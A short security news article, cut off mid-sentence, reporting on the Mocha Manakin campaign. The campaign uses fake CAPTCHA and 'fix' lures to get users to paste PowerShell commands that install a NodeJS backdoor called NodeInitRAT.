Mocha Manakin Uses Paste-and-Run Technique to Deceive Users into Downloading Malware

A malicious campaign tracked as Mocha Manakin has been identified employing the deceptive “paste-and-run” technique to trick unsuspecting users into executing harmful scripts.

First observed in August 2024 and actively monitored since January 2025 by security researchers at Red Canary, this threat cluster uses sophisticated social engineering lures to gain initial access to systems.

Emerging Threat Leverages Social Engineering

Often disguised as CAPTCHA verifications or access “fixes” for documents, websites, or software updates, these lures prompt users to copy and paste obfuscated PowerShell commands into their run dialog, inadvertently downloading malicious payloads from adversary-controlled infrastructure.

The technique’s effectiveness lies in its ability to exploit digital conditioning, manipulating users into following seemingly innocuous instructions that lead to severe consequences.

A Custom Backdoor for Persistence

Once executed, Mocha Manakin’s paste-and-run commands download a bespoke NodeJS-based backdoor named NodeInitRAT.

This remote access trojan, delivered via a ...